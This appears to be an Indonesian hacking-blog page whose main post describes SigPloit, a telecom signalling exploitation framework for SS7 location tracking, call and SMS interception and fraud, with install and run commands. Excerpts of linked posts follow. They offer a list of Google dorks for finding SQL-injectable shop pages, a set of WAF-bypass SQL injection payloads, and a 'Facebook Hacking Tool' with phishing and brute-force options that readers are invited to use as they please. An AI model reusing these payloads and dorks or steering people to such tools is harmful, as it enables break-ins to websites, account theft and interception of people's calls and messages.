SigPloit - Telecom Signaling Exploitation Framework

SiGploit merupakan pengujian keamanan pensinyalan yang didedikasikan untuk para profesional dan peneliti keamanan telekomunikasi untuk memantapkan dan mengeksploitasi kerentanan dalam protokol pensinyalan yang digunakan dalam operator seluler terlepas dari generasi yang digunakan. SiGploit bertujuan untuk mencakup semua protokol yang digunakan dalam interkoneksi operator SS7, GTP (3G), Diameter (4G) atau bahkan SIP untuk infrastruktur IMS dan VoLTE yang digunakan pada lapisan akses. Rekomendasi untuk setiap kerentanan akan diberikan untuk memandu penguji dan operator langkah-langkah yang harus dilakukan untuk meningkatkan postur keamanan mereka
SiGploit dikembangkan pada beberapa versi

SS7
SiGploit akan memulai secara awal dengan kerentanan SS7 yang menyediakan pesan yang digunakan untuk menguji skenario serangan di bawah ini A- Lokasi Pelacakan B- Panggilan dan Intersepsi SMS C- Penipuan

GTP
Versi ini akan fokus pada serangan roaming data yang terjadi pada interkoneksi IPX / GRX.

Diameter
Versi ini akan fokus pada serangan yang terjadi pada interkoneksi roaming LTE menggunakan Diameter sebagai protokol pensinyalan.

SIP

Versi ini akan membahas SIP sebagai protokol pensinyalan yang digunakan pada lapisan akses untuk voice over LTE (VoLTE) dan infrastruktur IMS. Juga SIP akan digunakan untuk merangkum pesan SS7 (ISUP) yang akan disampaikan melalui penyedia VoIP ke jaringan SS7 mengambil keuntungan dari protokol SIP-T, ekstensi protokol untuk SIP untuk menyediakan keterkaitan antara VoIP dan jaringan SS7

Installation SigPloit

SigPloit di tulis menggunakan program Python, untuk install SigPloit bisa melakukan cloning pada repository github berikut

git clone https://github.com/SigPloiter/SigPloit

Jika sudah clon github di atas, lalu masuk ke dalam directory SigPloit dan install file requirements dengan perintah berikut

cd SigPloit && pip2 install -r requirements.txt

Running SigPloit

Setelah proses di atas sudah terpenuhi, sekarang kita jalankan SigPloit nya dengan perintah berikut

python2 sigploit.py

Comments

Dork SQL Injection 2019

Hallo kali ini saya akan memberikan Dork untuk SQL Injection Yaps langsung saja di comot :p Dork ini bersumber dari : https://www.nextleveltricks.com/latest-google-dorks-list/ Ok langsung saja about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.ph

Macam-Macam Bypass WAF - SQL Injection

Pada postingan kali ini w mau sharing artikel tentang Maca-macam Bypass WAF pada suatu Sql Injection. Dalam dunia injector kita tidak asing lagi dengan istilah WAF. Apaan sih WAF itu? WAF adalah kepanjangan dari (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum. Jadi rata-rata web yang udah di pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) Untuk itu gw akan sedikit berbagi tentang jenis-jenis waf yang biasa di gunakan dalam dunia injector. Dan berikut ini macam-macam bypass waf, order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLe

FBHT v2.0 - Facebook Hacking Tool

FBHT (Facebook Hacking Tool) adalah tool open-source yang ditulis dengan program Python yang mengeksploitasi banyak kerentanan pada platform Facebook Install FBHT Tool Pertama sebelum menjalankan tool ini kalian harus melakukan cloning pada sebuah repository github berikut git clone https://github.com/chinoogawa/fbht Running FBHT Tool Menjalankan tool ini cukup mudah cukup ikuti perintah seperti ini python main.py Di sana banyak pilihan mulai dari Phising, Bruteforce dll, kalian bisa pilih dan menggunakan sesuka hati kalian :D

1 in 3 Red Creator

Search This Blog